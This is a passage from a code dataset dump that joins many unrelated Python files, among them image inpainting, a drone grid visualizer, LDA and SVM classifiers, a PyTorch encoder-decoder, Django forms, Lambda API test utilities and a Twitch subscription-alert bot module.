0\n\n for dx, dy in square:\n if shapeMask[y + dy, x + dx] == 0: # si fuera de la region a retocar\n confidence += c[y + dy, x + dx]\n\n confidence /= len(square)\n\n # consigo la componente normal del gradiente\n nx, ny = border_normal[index]\n\n # consigo el gradiente mas grande de la region\n\n max_grad = 0\n max_grad_value = 0, 0\n\n for dx, dy in square:\n # solo sumamos si esta fuera de la zona a retocar\n if shapeMask[y + dy, x + dx] == 0:\n\n dx = np.sum(sobel_x[y][x])/3 # promediamos los tres componentes del gradiente\n dy = np.sum(sobel_y[y][x])/3\n\n p = dx ** 2 + dy ** 2\n if p > max_grad: # buscamos el mayor gradiente en norma\n max_grad = p\n max_grad_value = dx, dy\n\n # producto escalar del gradiente con la normal acorde a la formula\n\n d = max_grad_value[0] * nx + max_grad_value[1] * ny\n\n # el beneficio es la confianza por el factor d\n\n benefit = abs(d * confidence)\n\n # buscamos maximizar el beneficio\n if benefit > best_benefit:\n best_benefit = benefit\n best_benefit_point = x, y\n\n if not best_benefit_point:\n print(\"No hay mas borde. Fin\")\n break\n\n # ahora vamos a calcular el parche que minimize la distancia\n\n px, py = best_benefit_point\n\n best_patch = px, py # default\n patch_distance = np.Infinity\n\n for i in range(search_times):\n # x = random.randint(px - search_square_size//2, px + search_square_size//2)\n # y = random.randint(py - search_square_size//2, py + search_square_size//2)\n x = int(random.normal(px, search_square_size//2**5,1))\n y = int(random.normal(py, search_square_size//2**5,1))\n\n if shapeMask[y, x] == 255:\n continue # no es de interes ya que esta en la region blanca\n\n #patch = imagen[y - square_size//2:y + square_size//2, x - square_size//2:x + square_size//2]\n #original = imagen[py - square_size//2:py + square_size//2, px - square_size//2:px + square_size//2]\n #total_sum = np.array([0])\n total_sum = 0\n # decidi usar fors porque se me estaban copiando los arreglos y en definitiva como son\n # todas operaciones elemento a elemento no son optimizables\n\n for yi in range(-square_size//2, square_size//2):\n for xi in range(-square_size//2, square_size//2):\n sum = 0\n for cmp in range(3):\n patch = int(imagen[y + yi][x + xi][cmp])\n original = int(imagen[py + yi][px + xi][cmp])\n\n sum += (patch - original)**2\n sum = sqrt(sum)\n #np.append(total_sum,sum**2)\n total_sum += sum**2\n #total_sum = total_sum.sum()\n #print(np.square(patch-original))\n\n if total_sum < patch_distance:\n patch_distance = sum\n best_patch = x, y\n\n bx, by = best_patch # best_patch_x, best_patch_y\n\n imagen[py - square_size//2: py + square_size//2, px - square_size//2: px + square_size//2] = \\\n imagen[by - square_size//2: by + square_size//2, bx - square_size//2: bx + square_size//2]\n\n ## copiamos la confianza del parche elegido a la la confianza del lugar donde copiamos el parche\n c[py - square_size // 2: py + square_size // 2, px - square_size // 2: px + square_size // 2] = \\\n c[by - square_size // 2: by + square_size // 2, bx - square_size // 2: bx + square_size // 2]*0.99\n\n ## marcamos la zona reemplazada como blanca\n mask[py - square_size // 2: py + square_size // 2, px - square_size // 2: px + square_size // 2] = \\\n [255, 255, 255]\n\n im2 = np.copy(imagen)\n\n if iteracion % 20 == 0:\n print(\"Iteracion \", iteracion)\n #for cnt in cnts:\n # cv2.drawContours(im2, [np.array(cnt)], 0, (255, 255, 0), 1)\n\n #cv2.drawContours(im2, [np.array([best_benefit_point])], 0, (0, 0, 255), 5)\n im = Image.fromarray(cv2.cvtColor(im2, cv2.COLOR_BGR2RGB))\n im.save(\"output3/imagen\" + str(iteracion) + \".jpeg\")\n\n #plt.imshow(cv2.cvtColor(im2, cv2.COLOR_BGR2RGB))\n #plt.savefig(\"output/imagen\" + str(iteracion) + \".jpeg\", dpi=1000)\n #scipy.misc.toimage(im2).save(\"output/imagen\" + str(iteracion) + \".jpeg\")\n\n\n #plt.imshow(cv2.cvtColor(mask, cv2.COLOR_BGR2RGB))\n #plt.savefig(\"output_mask/image/n\" + str(iteracion) + \".jpeg\", dpi=1000)\n #plt.show()\n\n\n\n #plt.imshow(cv2.cvtColor(imagen, cv2.COLOR_BGR2RGB))\n #plt.show()\n\n\n#img_intensity = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n#cv2.mixChannels(img, img_intensity)\n\n#print(img_intensity)\n#\nstart_time = time.time()\nprocesar(img, mask)\nend_time = time.time()\nprint(\"se calculo en:\", (end_time-start_time)/60, \" minutos\")\n#\n# plt.imshow(img2, cmap=\"gray\")\n\n#sobelx = cv2.Sobel(img_intensity, cv2.CV_64F, 1, 0, ksize=9)\n#sobely = cv2.Sobel(img_intensity, cv2.CV_64F, 0, 1, ksize=9)\n\n#print(img)\n\n#plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n\n#plt.imshow(sobelx, cmap=\"gray\")\n\n\n\n#plt.show()\n\n\n\n\n\n","sub_path":"InformeDefinitivo/informeNuevo/difusion/difusion_updated/archivos_viejos/viejomain.py","file_name":"viejomain.py","file_ext":"py","file_size_in_byte":8644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"145379389","text":"\"\"\"\nexercicio 37\nEscreva um programa que leia um número inteiro qualquer e peça para o usuário escolher qual será a base de conversão:\n1 - binário\n2 - octal\n3 - hexadecimal\n\"\"\"\nnum = int(input(\"Digite um número: \"))\nbase = int(input(\"\"\"\\n\\nEscolha a base de conversão:\n1 - binário\n2 - octal\n3 - hexadecimal\n\"\"\"))\ntipo = 'nenhum'\nif base == 1:\n\ttipo = 'binário'\n\tconv = bin(num)\nelif base == 2:\n\ttipo = 'octal'\n\tconv = oct(num)\nelif base == 3:\n\ttipo = 'hexadecimal'\n\tconv = hex(num)\nprint(\"\\n\\nO número {} em {}, fica {}\".format(num, tipo, conv[2:]))\n","sub_path":"conversão.py","file_name":"conversão.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"314551760","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# F.R.E.D project (c) 2015\n\nfrom control.utils import Vector3D\nfrom config import Config\nfrom terminal import Colors\nfrom grid import block_types\n\n\"\"\" Visualizes the app in terminal\n\n @author F.R.E.D authors\n\"\"\"\n\nclass Camera:\n\n def __init__(self):\n self.pos = Vector3D()\n\n def set_bounds(self, x, y):\n self.pos.x = x\n self.pos.y = y\n\nclass Visualizer2D:\n\n def __init__(self, gridsystem, control, route, terminal):\n self.window_id = \"\"\n self.legend_window_id = \"\"\n self.gridsystem = gridsystem\n self.control = control\n self.route = route\n self.camera = Camera()\n self.set_bounds(0, 0)\n self.terminal = terminal\n self._info_mode = False\n self.options = {\n block_types.AIR: ' ', # Air\n block_types.OBSTACLE: 'x', # Obstacle\n block_types.DANGER: 'o', # Danger\n block_types.WAYPOINT: 'W', # Waypoint\n block_types.EXIT: 'E', # EXIT,\n block_types.OBSTACLE_DYNAMIC: 'd' # Dynamic obstacle\n }\n self.colors = {\n block_types.AIR: Colors.WHITE,\n block_types.OBSTACLE: Colors.WHITE_FULL,\n block_types.DANGER: Colors.RED_FULL,\n block_types.WAYPOINT: Colors.BLUE,\n block_types.EXIT: Colors.YELLOW,\n block_types.OBSTACLE_DYNAMIC: Colors.MAGENTA\n }\n self.desc = {\n block_types.AIR: \"Air (passable space)\",\n block_types.OBSTACLE: 'Obstacle',\n block_types.DANGER: 'Danger',\n block_types.WAYPOINT: 'Waypoint',\n block_types.EXIT: 'Exit',\n block_types.OBSTACLE_DYNAMIC: 'Dynamic obstacle (can move over time)'\n }\n\n def info_mode(self, mode):\n self._info_mode = mode\n\n def set_bounds(self, x, y):\n self.camera.set_bounds(x, y)\n\n def show(self, screenX, screenY):\n if len(self.window_id) == 0:\n self.window_id = self.terminal.register_window(screenX, screenY, self.gridsystem.width() * 2 + screenX, self.gridsystem.length() + screenY)\n for y in range(self.camera.pos.y, self.camera.pos.y + self.gridsystem.y_block_count()):\n screenX = self.camera.pos.x\n for x in range(self.camera.pos.x, self.camera.pos.x + self.gridsystem.x_block_count()):\n self._print_block(screenX, y, x, y)\n self._print_block(screenX + 1, y, x, y)\n screenX += 2\n self.terminal.refresh(self.window_id)\n\n def legend(self, screenX, screenY):\n if len(self.legend_window_id) == 0:\n self.legend_window_id = self.terminal.register_window(screenX, screenY, 50, len(self.desc))\n line = 0\n for key, value in self.desc.iteritems():\n text = self.options[key] + \" - \" + value\n color = self.colors[key]\n if key == block_types.DANGER:\n color = Colors.RED\n elif key == block_types.OBSTACLE:\n color = Colors.WHITE\n self.terminal.print_text(self.legend_window_id, 0, line, text, color)\n line += 1\n self.terminal.refresh(self.legend_window_id)\n\n def _is_current_drone_position(self, x, y):\n drone_x = self.gridsystem.indexify(self.control.get_current_position().x)\n drone_y = self.gridsystem.indexify(self.control.get_current_position().y)\n return drone_x == x and drone_y == y\n\n def _is_route_point(self, x, y):\n for z in range(0, Config.GRID_HEIGHT):\n if self.route.contains(x * Config.SCALE, y * Config.SCALE, z * Config.SCALE):\n return True\n return False\n\n def _get_highest_block(self, x, y):\n highest_block = 0\n for z in range(0, Config.GRID_HEIGHT):\n block = self.gridsystem.get(x * Config.SCALE, y * Config.SCALE, z)\n if block > highest_block:\n current_block = block\n return current_block\n\n def _print_block(self, screenX, screenY, gridX, gridY):\n try:\n block = self._get_highest_block(gridX, gridY)\n if self._info_mode and self._is_route_point(gridX, gridY) and block == block_types.AIR:\n # Route\n self.terminal.print_text(self.window_id, screenX, screenY, 'o', Colors.YELLOW_FULL)\n elif not self._is_current_drone_position(gridX, gridY):\n if block == block_types.WAYPOINT and not self._info_mode:\n return\n # Background\n self.terminal.print_text(self.window_id, screenX, screenY, self.options[block], self.colors[block])\n if self._is_current_drone_position(gridX, gridY):\n # Drone\n self.terminal.print_text(self.window_id, screenX, screenY, 'F', Colors.GREEN_FULL)\n except Exception as e:\n self.terminal.print_text(self.window_id, 0, 0, str(e), self.colors[block])\n","sub_path":"core/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":4980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"517045837","text":"from sklearn import datasets\nimport numpy as np\nfrom numpy.linalg import inv\nimport matplotlib.pyplot as plt\n\n# Classes C2 and C3\n\niris = datasets.load_iris()\nX1 = np.array(iris.data[50:100, :])\nX2 = np.array(iris.data[100:150, :])\nX = np.concatenate((X1, X2))\n\nm1 = np.array([0.02*np.sum(X1[:, n]) for n in range(4)])\nm2 = np.array([0.02*np.sum(X2[:, n]) for n in range(4)])\n\nprint('m1 = ', m1)\nprint('m2 = ', m2)\n\nsw = X1.T.dot(X1)-m1.T.dot(m1) + X2.T.dot(X2)-m2.T.dot(m2)\n\nprint('Sw = ', sw)\n\nw = inv(sw).dot(m2-m1)\n\nprint('w = ', w)\n\ny = X.dot(w)\n\nplt.figure()\ncolors = ['turquoise', 'orange']\nlw = 2\n\ny = np.where(y < 0, 0, 1)\n\n# print(X[y == 0, 0])\n# print(X[y == 1, 0])\nfor color, i in zip(colors, [0, 1]):\n plt.scatter(X[y == i, 0], X[y == i, 1], color=color, alpha=.8, lw=lw)\n# plt.legend(loc='best', shadow=False, scatterpoints=1)\nplt.title('LDA IRIS C2 X C3')\nplt.xlabel('Sepal.Length')\nplt.ylabel('Sepal.Width')\nplt.show()\n","sub_path":"codigos/tarefa4_13.py","file_name":"tarefa4_13.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"485208362","text":"import torch\nimport torch.nn as nn\n\nDEVICE = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n\nclass Encoder(nn.Module):\n def __init__(self, input_sz: int, hidden_sz: int, in_pad_idx: int, num_layer: int, embed_sz: int):\n super(Encoder, self).__init__()\n self.input_sz = input_sz\n self.hidden_sz = hidden_sz\n self.num_layer = num_layer\n self.embed = nn.Embedding(input_sz, embed_sz, in_pad_idx)\n self.lstm = nn.LSTM(embed_sz, hidden_sz, num_layers=num_layer)\n\n def forward(self, input: torch.Tensor, non_padded_len: torch.Tensor, hidden: torch.Tensor = None):\n batch_sz = input.shape[1]\n embedded_input = self.embed(input)\n pps_input = nn.utils.rnn.pack_padded_sequence(\n embedded_input, non_padded_len, enforce_sorted=False)\n\n hidden = self.init_hidden(batch_sz)\n\n _, hidden = self.lstm.forward(pps_input, hidden)\n\n return hidden\n\n def init_hidden(self, batch_sz: int):\n return (torch.zeros(self.num_layer, batch_sz, self.hidden_sz).to(DEVICE),\n torch.zeros(self.num_layer, batch_sz, self.hidden_sz).to(DEVICE))\n\n\nclass Decoder(nn.Module):\n def __init__(self, input_sz: int, hidden_sz: int, in_pad_idx: int, num_layer: int, embed_sz: int,\n drop_out: float = 0.1):\n super(Decoder, self).__init__()\n self.input_sz = input_sz\n self.hidden_sz = hidden_sz\n self.num_layer = num_layer\n self.embed = nn.Embedding(input_sz, embed_sz, in_pad_idx)\n self.lstm = nn.LSTM(embed_sz, hidden_sz, num_layers=num_layer)\n self.sigmoid = nn.Sigmoid()\n self.fc1 = nn.Linear(hidden_sz, input_sz)\n self.drop_out = nn.Dropout(drop_out)\n self.softmax = nn.LogSoftmax(dim=2)\n\n def forward(self, input: torch.Tensor, hidden: torch.Tensor):\n embedded_input = self.embed(input)\n output, hidden = self.lstm(embedded_input, hidden)\n sigmoid_out = self.sigmoid(output)\n fc1_out = self.fc1(sigmoid_out)\n output = self.drop_out(fc1_out)\n probs = self.softmax(output)\n\n return probs, hidden\n","sub_path":"model/ReverseAE.py","file_name":"ReverseAE.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"87705753","text":"#!/usr/bin/python\nfrom sklearn import svm\nfrom sklearn import cross_validation\nimport numpy as np\ndef process_category(category,data):\n svc=svm.SVC(C=10)\n X=[]\n Y=[]\n for unit in data:\n vec=data[unit]['vector']\n X.append(vec)\n if data[unit]['actual']!=category:\n Y.append(-1)\n else:\n Y.append(1)\n\n dataX=np.array(X)\n dataY=np.array(Y)\n svc=svm.SVC(C=10)\n svc.fit(dataX,dataY)\n score=cross_validation.cross_val_score(svc,dataX,dataY,cv=10)\n return score\n\n#-----script entry\ngames={}\n#read raw data\nheader=True\nfor line in file('feedData.txt'):\n #skip header\n if header:\n header=False\n continue\n tuples=line.strip().split('\\t')\n gameName=tuples[0]\n games[gameName]={}\n games[gameName]['vector']=[float(wc) for wc in tuples[1:]]\n#read category file\nfor line in file('p2_table.txt'):\n tuples=line.strip().split('\\t')\n gname=tuples[0]\n games[gname]['actual']=tuples[2]\n#classification\ncatetories=['fighting','sports','rpg','arpg','racing','platform','action','fps']\nfor c in catetories:\n performance=process_category(c,games)\n print('Category: %s'%c)\n for score in performance:\n print(score),\n print(score.mean())","sub_path":"assignments/a10/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"108192246","text":"import logging\n\nfrom django import forms\nfrom django.conf import settings\nfrom django.core.mail import send_mail\nfrom django.template import loader\nfrom django.utils.translation import ugettext_lazy as _\nfrom wagtail.wagtailcore.models import Site\n\nfrom core.models import ComsesGroups, SocialMediaSettings\n\nlogger = logging.getLogger(__name__)\n\n\nclass ContactForm(forms.Form):\n name = forms.CharField(max_length=100, label=_('Your name'))\n email = forms.EmailField(max_length=255, label=_('Your email address'))\n subject_text = forms.CharField(max_length=100, label=_('Message subject'))\n body = forms.CharField(widget=forms.Textarea, label=_('Your message'))\n\n subject_template_name = 'home/about/contact_form_subject.txt'\n template_name = 'home/about/contact_form_email.txt'\n from_email = settings.DEFAULT_FROM_EMAIL\n\n def __init__(self, request=None, initial=None, *args, **kwargs):\n if request is None:\n raise ValueError(\"kwarg request is required\")\n if initial is None:\n initial = {}\n self.request = request\n if request.user.is_authenticated:\n user = request.user\n initial.update(name=user.member_profile.name,\n email=user.email)\n super().__init__(initial=initial, *args, **kwargs)\n\n def get_context(self):\n if not self.is_valid():\n raise ValueError(\"Cannot get_context() from invalid contact form\")\n site = Site.objects.first()\n return dict(self.cleaned_data, site=site)\n\n @property\n def recipient_list(self):\n return SocialMediaSettings.for_site(self.request.site).contact_form_recipients\n\n @property\n def subject(self):\n subject = loader.render_to_string(\n self.subject_template_name, self.get_context(), request=self.request\n )\n return ''.join(subject.splitlines())\n\n @property\n def message(self):\n \"\"\"\n Returns the template rendered message body as a string.\n :return:\n \"\"\"\n return loader.render_to_string(\n self.template_name, self.get_context(), request=self.request\n )\n\n def save(self, fail_silently=False):\n if not self.is_valid():\n raise ValueError(\"Can't send a message from invalid contact form\")\n message_dict = {\n 'from_email': self.cleaned_data.get('email') or self.from_email,\n 'recipient_list': self.recipient_list,\n 'subject': self.subject,\n 'message': self.message,\n }\n send_mail(fail_silently=fail_silently, **message_dict)\n","sub_path":"django/home/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"204959037","text":"from django import forms\n\nfrom .models import Documentation\n\n\nclass DocUploadForm(forms.ModelForm):\n '''Form for documentation file upload'''\n class Meta(object):\n model = Documentation\n fields = [\n \"name\",\n \"doc_file\", \n ]\n widgets = {\n 'name': forms.TextInput(attrs={'placeholder': 'Enter Title','class': 'form-control'}),\n }\n","sub_path":"docupload/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"462141493","text":"import numpy\nimport pickle\nimport glob\n\nfrom music21 import corpus, converter\n\nfrom keras.models import Model\nfrom keras.layers import LSTM, Input, Dropout, Dense, Activation, Embedding, Concatenate\nfrom keras.optimizers import RMSprop\nfrom keras.utils import np_utils\n\ndef get_music_list(name):\n \n if name == 'bach':\n file_list = ['bwv' + str(x['bwv']) for x in corpus.chorales.ChoraleList().byBWV.values()]\n parser = corpus\n elif name == 'local':\n file_list = glob.glob(\"midi_songs/*.mid\")\n parser = converter\n \n return file_list, parser\n\ndef create_network(n_notes, n_durations, seq_len = None, embed_size = 100):\n \"\"\" create the structure of the neural network \"\"\"\n\n notes_in = Input(shape = (seq_len,))\n durations_in = Input(shape = (seq_len,))\n\n x1 = Embedding(n_notes, embed_size)(notes_in)\n x2 = Embedding(n_durations, embed_size)(durations_in) \n\n x = Concatenate()([x1,x2])\n\n x = LSTM(256, return_sequences=True)(x)\n x = Dropout(0.2)(x)\n x = LSTM(256)(x)\n x = Dropout(0.2)(x)\n notes_out = Dense(n_notes, activation = 'softmax')(x)\n durations_out = Dense(n_durations, activation = 'softmax')(x)\n\n model = Model([notes_in, durations_in], [notes_out, durations_out])\n\n # model.summary()\n\n opti = RMSprop(lr = 0.001)\n model.compile(loss=['categorical_crossentropy', 'categorical_crossentropy'], optimizer=opti)\n\n return model\n\n\ndef get_distinct(elements):\n # Get all pitch names\n element_names = sorted(set(elements))\n n_elements = len(element_names)\n return (element_names, n_elements)\n\ndef create_lookups(element_names):\n # create dictionary to map notes and durations to integers\n element_to_int = dict((element, number) for number, element in enumerate(element_names))\n int_to_element = dict((number, element) for number, element in enumerate(element_names))\n\n return (element_to_int, int_to_element)\n \n\ndef prepare_sequences(notes, durations, lookups, distincts):\n \"\"\" Prepare the sequences used to train the Neural Network \"\"\"\n sequence_length = 32\n\n note_to_int, int_to_note, duration_to_int, int_to_duration = lookups\n note_names, n_notes, duration_names, n_durations = distincts\n\n notes_network_input = []\n notes_network_output = []\n durations_network_input = []\n durations_network_output = []\n\n # create input sequences and the corresponding outputs\n for i in range(len(notes) - sequence_length):\n notes_sequence_in = notes[i:i + sequence_length]\n notes_sequence_out = notes[i + sequence_length]\n notes_network_input.append([note_to_int[char] for char in notes_sequence_in])\n notes_network_output.append(note_to_int[notes_sequence_out])\n\n durations_sequence_in = durations[i:i + sequence_length]\n durations_sequence_out = durations[i + sequence_length]\n durations_network_input.append([duration_to_int[char] for char in durations_sequence_in])\n durations_network_output.append(duration_to_int[durations_sequence_out])\n\n n_patterns = len(notes_network_input)\n\n # reshape the input into a format compatible with LSTM layers\n notes_network_input = numpy.reshape(notes_network_input, (n_patterns, sequence_length))\n durations_network_input = numpy.reshape(durations_network_input, (n_patterns, sequence_length))\n network_input = [notes_network_input, durations_network_input]\n\n notes_network_output = np_utils.to_categorical(notes_network_output, num_classes=n_notes)\n durations_network_output = np_utils.to_categorical(durations_network_output, num_classes=n_durations)\n network_output = [notes_network_output, durations_network_output]\n\n return (network_input, network_output)\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"614086293","text":"\"\"\"\nUtility functions\n\"\"\"\nimport requests\nimport random\nimport string\nimport json\nimport os\nimport urllib.parse\nfrom lambda_code.lambda_function import lambda_handler\nfrom lambda_code.constants import MAX_USERNAME_SIZE, GET_REQUEST_STR, POST_REQUEST_STR, HTTP_METHOD_STR, \\\n PASSWORD_HASH_SIZE, HASH_CHARS, DELETE_REQUEST_STR\nfrom BuildConstants import IMPLEMENTED_HTTP_METHODS\n\n_REQUEST_URL = \"https://mvmb9qdwti.execute-api.us-west-1.amazonaws.com/WingitProduction/wingitresource\"\n_HEX_CHARS = \"0123456789abcdefABCDEF\"\n_INIT_RECIPES_DIR = \"./initial_recipes\"\n\nREQUEST_TYPE_ONLINE = True # Whether or not we are testing online or offline\n\n\ndef set_request_type_online(request_type_is_online):\n \"\"\"\n Call this with boolean input to determine if we should test online or offline\n :param request_type_is_online: boolean\n \"\"\"\n global REQUEST_TYPE_ONLINE\n REQUEST_TYPE_ONLINE = request_type_is_online\n\n\ndef request(**params):\n \"\"\"\n Sends a request to the API with the given params\n :param params: a kwargs list of params\n :return: the response from the server\n \"\"\"\n http_method = params[HTTP_METHOD_STR]\n\n if REQUEST_TYPE_ONLINE:\n if http_method == GET_REQUEST_STR:\n response = requests.get(_REQUEST_URL, params=params).json()\n elif http_method == POST_REQUEST_STR:\n response = requests.post(_REQUEST_URL, data=params).json()\n elif http_method == DELETE_REQUEST_STR:\n response = requests.delete(_REQUEST_URL, data=params).json()\n else:\n raise ValueError(\"Unknown request type: %s, not in %s\" % (http_method, IMPLEMENTED_HTTP_METHODS))\n\n if 'message' in response:\n raise ValueError(\"Internal server error with params: %s\\nOutput: %s\" % (params, response))\n return response\n else:\n if http_method == GET_REQUEST_STR:\n d = {HTTP_METHOD_STR: http_method, 'queryStringParameters': params}\n elif http_method in [POST_REQUEST_STR, DELETE_REQUEST_STR]:\n d = {HTTP_METHOD_STR: http_method, 'body': urllib.parse.urlencode(params)}\n else:\n raise ValueError(\"Unknown request type: %s, not in %s\" % (http_method, IMPLEMENTED_HTTP_METHODS))\n\n # The return body is a string (because json.dumps) so we must call eval on it\n return json.loads(lambda_handler(d, None)['body'])\n\n\ndef random_str(size, all_ascii=True):\n \"\"\"\n Returns a random string of characters\n :param size: the number of characters to use\n :param all_ascii: if True, then the only characters returned will be ascii chars\n \"\"\"\n return ''.join(\n (random.choice(string.ascii_letters) if all_ascii else chr(random.randint(0, 255))) for i in range(size))\n\n\ndef random_valid_password_hash():\n \"\"\"\n Generates a random password that passes validity checks on the server\n \"\"\"\n return ''.join(random.choice(HASH_CHARS) for i in range(PASSWORD_HASH_SIZE))\n\n\ndef random_valid_username():\n \"\"\"\n Generates a random username that passes validity checks on the server, and probably isn't used by anyone\n \"\"\"\n return random_str(MAX_USERNAME_SIZE, all_ascii=True)\n\n\ndef random_valid_email():\n \"\"\"\n Generates a random email that passes validity checks on the server, and probably isn't used by anyone\n \"\"\"\n return random_str(64, all_ascii=True) + '@gmail.com'\n\n\ndef get_binary_permutations(n):\n \"\"\"\n Returns a list of strings of binary representations of all integers in range [0, 2**n)\n \"\"\"\n def pad(s):\n return ('0' * (n - len(s)) + s) if len(s) < n else s\n\n return [pad(bin(i)[2:]) for i in range(2 ** n)]\n\n\ndef read_recipe_info():\n ret = []\n ret_pics = []\n for i, file in enumerate(os.listdir(_INIT_RECIPES_DIR)):\n if file.endswith(\".txt\"):\n with open(os.path.join(_INIT_RECIPES_DIR, file), 'r') as f:\n fields = _split_list(f.readlines())\n ret.append(fields)\n ret_pics.append(os.path.join(_INIT_RECIPES_DIR, file.replace('.txt', '.jpg')))\n\n return ret, ret_pics\n\n\ndef _split_list(lines):\n ret = []\n curr = \"\"\n for line in lines:\n if line == '\\n':\n ret.append(curr[:-1])\n curr = \"\"\n else:\n curr += line\n return ret + [curr]\n","sub_path":"lambda/tests/LambdaTestUtils.py","file_name":"LambdaTestUtils.py","file_ext":"py","file_size_in_byte":4278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"339645377","text":"import logging\nimport re\n\nfrom pajbot.modules import BaseModule, ModuleSetting\nfrom pajbot.models.command import Command\nfrom pajbot.models.handler import HandlerManager\n\nlog = logging.getLogger(__name__)\n\n\nclass SubAlertModule(BaseModule):\n\n ID = __name__.split('.')[-1]\n NAME = 'Subscription Alert (text)'\n DESCRIPTION = 'Prints a message in chat for someone who subscribed'\n CATEGORY = 'Feature'\n ENABLED_DEFAULT = True\n SETTINGS = [\n ModuleSetting(\n key='new_sub',\n label='New sub',\n type='text',\n required=True,\n placeholder='Sub hype! {username} just subscribed PogChamp',\n default='Sub hype! {username} just subscribed PogChamp',\n constraints={\n 'min_str_len': 10,\n 'max_str_len': 400,\n }),\n ModuleSetting(\n key='resub',\n label='Resub',\n type='text',\n required=True,\n placeholder='Resub hype! {username} just subscribed, {num_months} months in a row PogChamp <3 PogChamp',\n default='Resub hype! {username} just subscribed, {num_months} months in a row PogChamp <3 PogChamp',\n constraints={\n 'min_str_len': 10,\n 'max_str_len': 400,\n }),\n ]\n\n def __init__(self):\n super().__init__()\n self.new_sub_regex = re.compile('^(\\w+) just subscribed!')\n self.resub_regex = re.compile('^(\\w+) subscribed for (\\d+) months in a row!')\n\n def on_new_sub(self, user):\n \"\"\"\n A new user just subscribed.\n Send the event to the websocket manager, and send a customized message in chat.\n Also increase the number of active subscribers in the database by one.\n \"\"\"\n\n self.bot.kvi['active_subs'].inc()\n\n payload = {'username': user.username_raw}\n self.bot.websocket_manager.emit('new_sub', payload)\n\n self.bot.say(self.get_phrase('new_sub', **payload))\n\n def on_resub(self, user, num_months):\n \"\"\"\n A user just re-subscribed.\n Send the event to the websocket manager, and send a customized message in chat.\n \"\"\"\n\n payload = {'username': user.username_raw, 'num_months': num_months}\n self.bot.websocket_manager.emit('resub', payload)\n\n self.bot.say(self.get_phrase('resub', **payload))\n\n def on_message(self, source, message, emotes, whisper, urls, event):\n if whisper is False and source.username == 'twitchnotify':\n # Did twitchnotify tell us about a new sub?\n m = self.new_sub_regex.search(message)\n if m:\n username = m.group(1)\n self.on_new_sub(self.bot.users[username])\n else:\n # Did twitchnotify tell us about a resub?\n m = self.resub_regex.search(message)\n if m:\n username = m.group(1)\n num_months = m.group(2)\n self.on_resub(self.bot.users[username], int(num_months))\n\n def enable(self, bot):\n HandlerManager.add_handler('on_message', self.on_message)\n self.bot = bot\n\n def disable(self, bot):\n HandlerManager.remove_handler('on_message', self.on_message)\n","sub_path":"pajbot/modules/subalert.py","file_name":"subalert.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"653354965","text":"# This program will counts the frequency of characters on a string.\n\nimport pprint as pp\ntext = 'This a simple text to TEST the code.'\n\nletters = {}\n\nfor i in text:\n letters.setdefault(i, 0)\n letters[i] = letters[i]+1\n\npp.pprint(letters)","sub_path":"SomeProblems/Character_counter.py","file_name":"Character_counter.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"415941389","text":"from z3 import *\n\n\n\nx = Int('x')\ny = Int('y')\nsolve(x == x/2 + y/2, x>=0, y>=0, y <= x)\n#f = Function('f', IntSort(), IntSort())\n#solve(f(f(x)) == x, f(x) == y, x != y)\n\n","sub_path":"a1/z3test.py","file_name":"z3test.py","file_ext":"py","file_size_in_byte":170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"612203581","text":"from itertools import combinations\n\n\nn,m = map(int,input().split())\n\n\nmaps = []\n\n\nfor i in range(n):\n maps.append(list(map(int,input().split())))\n\n\nchickens = []\nhouse = []\n\n\nfor i in range(n):\n for j in range(n):\n if maps[i][j] == 2:\n chickens.append([i,j])\n elif maps[i][j] == 1:\n house.append([i,j])\n\n\n# 모든 조합구하기\ncombs = list(combinations(chickens,m))\n\nans = []\n\nfor chicks in combs:\n\n tot_dis = 0\n\n for h in house:\n hx,hy = h\n\n min_dis = 100\n\n for c in chicks:\n cx,cy = c\n\n tmp_num = abs(hx-cx) + abs(hy-cy)\n\n min_dis = min(min_dis,tmp_num)\n\n tot_dis+=min_dis\n\n ans.append(tot_dis)\n\nans.sort()\n\nprint(ans[0])","sub_path":"baekjoon/baekjoon15686.py","file_name":"baekjoon15686.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"528917122","text":"\nimport heapq\n\ndef read_input():\n m = int(input())\n adjacent = dict()\n for i in range(m):\n a, b, dep, dur = input().split()\n if int(dep) < 18:\n dep = int(dep) + 6\n else:\n dep = int(dep) + 6 - 24\n for city in (a, b):\n if city not in adjacent:\n adjacent[city] = []\n adjacent[a].append((dep, int(dur), b))\n s, t = input().split()\n return adjacent, s, 